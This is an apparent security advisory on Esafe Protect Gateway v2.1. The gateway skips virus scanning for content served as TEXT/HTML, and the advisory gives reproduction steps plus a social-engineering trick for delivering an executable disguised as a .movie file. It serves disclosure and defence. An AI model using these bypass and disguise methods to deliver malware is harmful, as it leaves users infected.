COMMAND
Esafe Protect Gateway (CVP)
SYSTEMS AFFECTED
Esafe Protect Gateway (CVP) v2.1 build 98
PROBLEM
Hugo van der Kooij found following. The Esafe Protect Gateway
(ESPG) does not scan some files in combination with FireWall-1
and CVP.
If you want the Esafe Protect Gateway to scan all content for the
presence of a virus you have two options.
1. Choose to scan anything not listed in the 'safe file types'
list. And then clear out all entries in that list.
2. Choose to scan only files listed in the 'dangerous file
types' list. And then have only one extension listed
namely '*'.
Deciding to rely on extensions seems an indication of a flawed
design allready. Renaming files is a common practice and can be
done by anyone capable of operating a keyboard.
The problem is that anything with the MIME type set to TEXT/HTML
will not be scanned regardless of the options recommended above.
A simple test was capable of pointing this out.
Setup a default Apache server. Copy a virusfile to two location
being http://website/test1.txt and http://website/test1.html and
try to download them with your favorite browser. The URL is
unique and was never used by your browser to minimize the
possibilities of caches being in place. But forced reloads work
properly and are sufficiant if you want to replicate this issue.
Downloading http://website/test1.html dows nothing to detect the
virus and it is yours. No protection is offered. Downloading
http://website/test1.txt will not work as ESPG will now intercept
the file contain the virus.
By adjusting the webserver to send out *.txt as MIME type
TEXT/HTML and *.html as MIME type TEXT/PLAIN you can now test with
http://website/test2.txt and http://website/test2.html to verify
things. Downloading http://website/test2.txt will get you
infected as ESPG will not scan the file. And downloading
http://website/test2.html will not work as ESPG detects the virus
and will prevent it from downloading.
This was tested with Esafe Protect Gateway v2.1 build 98, virus
tables dated March 15, 2000.
Simple situation. Provide a supposed link to a .movie file which
is actually an executable with an embedded .avi (could be any
nonstandard non executable file type .movie just works well) for
download. The web server presents this as video/x-sgi-movie for
the mime type. The user saves it to disk and follows the brief
instruction for playing it by doing a start/run "start [download
path]\test.movie" the trojaned file looks like a movie playing
and exits but has delivered it's payload in the interim. Demo:
- copy notepad.exe to %TEMP%\test.movie
- do a start/run
- type in "start [tmpdir]\test.movie"
- you now have notepad up on the screen.
The lab tests performed proven that any file using the MIME header
TEXT/HTML is passed without verificationi regardless of the
extension. Using another vendor's CVP server testers were able to
verify the issue was not a FireWall-1 problem but in fact that of
the ESPG CVP server. Trend Micro did find the virus in both
TEXT/PLAIN and TEXT/HTML MIME types.
SOLUTION
The trade off between performance and protection sufficiency is a
well known issue in the world of data security. As suggested by
Mr. Van der Kooij, it is possible to make files go through eSafe
Gateway without being scanned for viruses, thus creating security
holes. eSafe believes that relying on file extension in order to
avoid threats and virus assaults is highly efficient. This is
definitely not due to a "flawed design". At eSafe, they believe
that it is possible to achieve a high level of security and
privacy, while relying on the files extensions.
The subject described above according to Esafe is not a bug, nor
a security problem. Hence, no fix is needed. On the other side
The Dutch office informed Hugo van der Kooij that the issue is
now know by the ID: DR/047 and being handled by the development
crew.
Esafe Protect Gateway can at present not be trusted to protect
you from downloading a virus.